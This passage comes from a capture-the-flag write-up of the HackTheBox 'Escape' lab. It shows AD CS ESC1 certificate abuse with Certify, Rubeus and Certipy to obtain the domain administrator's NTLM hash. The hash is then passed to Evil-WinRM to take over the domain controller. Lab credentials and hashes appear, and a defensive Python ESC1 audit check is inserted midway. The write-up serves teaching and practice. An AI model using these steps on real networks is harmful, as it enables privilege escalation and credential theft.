Certify completed in 00:00:14.2586605
We will copy everything from -----BEGIN RSA PRIVATE KEY----- to -----END CERTIFICATE----- into a file on our host and convert it to a .pfx using the command given, entering no password when prompted:
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
We will upload cert.pfx, as well as a copy of Rubeus (downloaded from SharpCollection), and then run the asktgt command, passing it the certificate to get a TGT as administrator:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> upload Rubeus.exe
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> upload cert.pfx
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\documents\cert.pfx
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::4962:1632:659d:e390%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 10/12/2024 9:29:40 AM
EndTime : 10/12/2024 7:29:40 PM
RenewTill : 10/19/2024 9:29:40 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : BKBLFIk+E1K8gzVRsHTH7A==
ASREP (key) : 85742085636725858D930F1414606557
It works! Rubeus tries to load the returned ticket directly into the current session, so in theory, once we run this we could just enter administrator’s folders and get the flag. However, this doesn’t work over Evil-WinRM.
Instead, we are going to run the same command with /getcredentials /show /nowrap. This does the same thing, and additionally tries to dump credential information about the account:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\documents\cert.pfx /getcredentials /show /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::4962:1632:659d:e390%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 10/12/2024 9:31:26 AM
EndTime : 10/12/2024 7:31:26 PM
RenewTill : 10/19/2024 9:31:26 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : DIAHQIuZHSEZlbQBDkLc+A==
ASREP (key) : 110909A97E0152C6912DECA81DCFBE8F
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
The last line is the NTLM hash for the administrator account.
An alternative tool to accomplish the same thing is Certipy, which is nice because I can run it remotely from my VM. It has a find command that will identify the vulnerable template:
(Install Certipy by running:)
└─$ sudo apt install pipx
└─$ pipx install certipy-ad
└─$ certipy find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
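Certipy's ESC1 verdict comes down to a handful of template settings all holding at the same time. As an added example (my own code, not part of this write-up or of Certipy), here is a small audit check over those settings, fed with the UserAuthentication template above and with two single-setting fixes beside it; the Template field names and the low-privilege group list are my own assumptions.

```python
from dataclasses import dataclass, replace

# Groups every domain account is effectively in (assumption: extend for your forest).
LOW_PRIV_GROUPS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}
# EKUs that make a certificate usable for Kerberos PKINIT logon.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}

@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool
    enrollee_supplies_subject: bool
    extended_key_usage: tuple        # empty tuple == no EKU restriction at all
    requires_manager_approval: bool
    authorized_signatures_required: int
    enrollment_rights: tuple         # 'DOMAIN\\Principal' strings

def esc1_conditions(t: Template) -> dict:
    """Evaluate each ESC1 precondition separately so a report can say *why*."""
    ekus = set(t.extended_key_usage)
    return {
        "enabled": t.enabled,
        "low_priv_can_enroll": any(p.split("\\")[-1] in LOW_PRIV_GROUPS
                                   for p in t.enrollment_rights),
        "enrollee_supplies_subject": t.enrollee_supplies_subject,
        "client_auth_eku": not ekus or bool(ekus & AUTH_EKUS),
        "no_manager_approval": not t.requires_manager_approval,
        "no_signatures_required": t.authorized_signatures_required == 0,
    }

def is_esc1(t: Template) -> bool:
    """ESC1 needs every condition at once; clearing any single one closes it."""
    return all(esc1_conditions(t).values())

# Constructed from the Certipy 'find' output above (field names are mine).
USER_AUTHENTICATION = Template(
    name="UserAuthentication", enabled=True, enrollee_supplies_subject=True,
    extended_key_usage=("Client Authentication", "Secure Email",
                        "Encrypting File System"),
    requires_manager_approval=False, authorized_signatures_required=0,
    enrollment_rights=("SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Domain Users",
                       "SEQUEL.HTB\\Enterprise Admins"),
)
# Two one-setting fixes: either one breaks the chain on its own.
NO_SUBJECT_SUPPLY = replace(USER_AUTHENTICATION, enrollee_supplies_subject=False)
MANAGER_APPROVAL = replace(USER_AUTHENTICATION, requires_manager_approval=True)
```

The same check can be run over every template a `certipy find` pass enumerates; only a template where every condition in `esc1_conditions` is true is an ESC1 candidate.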
And req allows us to get the .pfx certificate, just like what we did with Certify.exe and openssl above:
└─$ certipy req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
The auth command will take that certificate (administrator.pfx) and get the hash.
└─$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
I noted above that there was an eight-hour difference in clock times. I can sync the clock with Escape using ntpdate:
└─$ sudo ntpdate -u sequel.htb
2024-10-12 12:43:01.268731 (-0400) +28800.405648 +/- 0.095215 sequel.htb 10.129.228.253 s1 no-leap
CLOCK: time stepped by 28800.405648
Now we can dump the hash:
└─$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
We can now connect to the DC with Evil-WinRM using administrator's NTLM hash:
└─$ evil-winrm -i 10.129.228.253 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
We can get root.txt on Administrator's Desktop:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
0bb099b417e05141ed88932a9a14c558
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : dc
Primary Dns Suffix . . . . . . . : sequel.htb
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : sequel.htb
.htb
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-7A-DD
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::4962:1632:659d:e390(Preferred)
Link-local IPv6 Address . . . . . : fe80::4962:1632:659d:e390%4(Preferred)
IPv4 Address. . . . . . . . . . . : 10.129.228.253(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Saturday, October 12, 2024 8:01:29 AM
Lease Expires . . . . . . . . . . : Saturday, October 12, 2024 10:31:29 AM
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%4
10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DHCPv6 IAID . . . . . . . . . . . : 251678806
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-88-DA-51-00-0C-29-37-43-59
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
References
- https://0xdf.gitlab.io/2023/06/17/htb-escape.html
- https://github.com/ly4k/Certipy
- https://github.com/GhostPack/Certify
- https://github.com/Flangvik/SharpCollection/tree/master/NetFramework_4.7_Any